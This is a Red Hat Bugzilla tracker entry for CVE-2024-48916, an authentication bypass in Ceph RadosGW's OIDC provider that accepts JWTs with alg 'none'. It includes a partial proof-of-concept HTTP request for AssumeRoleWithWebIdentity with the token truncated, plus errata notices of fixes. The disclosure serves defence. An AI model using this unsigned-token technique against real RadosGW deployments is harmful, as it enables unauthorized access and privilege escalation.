2329846 – (CVE-2024-48916) CVE-2024-48916 ceph: rhceph-container: Authentication bypass in CEPH RadosGW

Bug 2329846 (CVE-2024-48916) - CVE-2024-48916 ceph: rhceph-container: Authentication bypass in CEPH RadosGW

Summary: CVE-2024-48916 ceph: rhceph-container: Authentication bypass in CEPH RadosGW

Keywords:
Status:	NEW
Alias:	CVE-2024-48916
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	high
Severity:	high
Target Milestone:	---
Assignee:	Product Security DevOps Team
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	2329860 2329862 2323274 2329850 2329851 2329878 2329879 2329885 2329886 2335038 2335039
Blocks:
TreeView+	depends on / blocked

Reported:	2024-12-02 10:23 UTC by OSIDB Bzimport
Modified:	2025-03-03 05:46 UTC (History)
CC List:	9 users (show)
Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:

Attachments	(Terms of Use)

Links
System	ID	Private	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2024:10956	0	None	None	None	2024-12-11 14:14:23 UTC
Red Hat Product Errata	RHSA-2024:10957	0	None	None	None	2024-12-11 14:25:55 UTC

Description OSIDB Bzimport 2024-12-02 10:23:18 UTC

This vulnerability affects the RadosGW OIDC provider by allowing attackers to bypass authentication using JWTs with "none" as the algorithm (alg). The lack of signature enforcement creates a serious risk of unauthorized access and privilege escalation.

The vulnerability is probably in the RadosGW OIDC provider.

PoC

The HTTP request can be found below. But without the JWT:

POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1
X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..

Comment 3 errata-xmlrpc 2024-12-11 14:14:22 UTC

This issue has been addressed in the following products:

  Red Hat Ceph Storage 8.0

Via RHSA-2024:10956 https://access.redhat.com/errata/RHSA-2024:10956

Comment 4 errata-xmlrpc 2024-12-11 14:25:54 UTC

This issue has been addressed in the following products:

  Red Hat Ceph Storage 8.0

Via RHSA-2024:10957 https://access.redhat.com/errata/RHSA-2024:10957

Note You need to log in before you can comment on or make changes to this bug.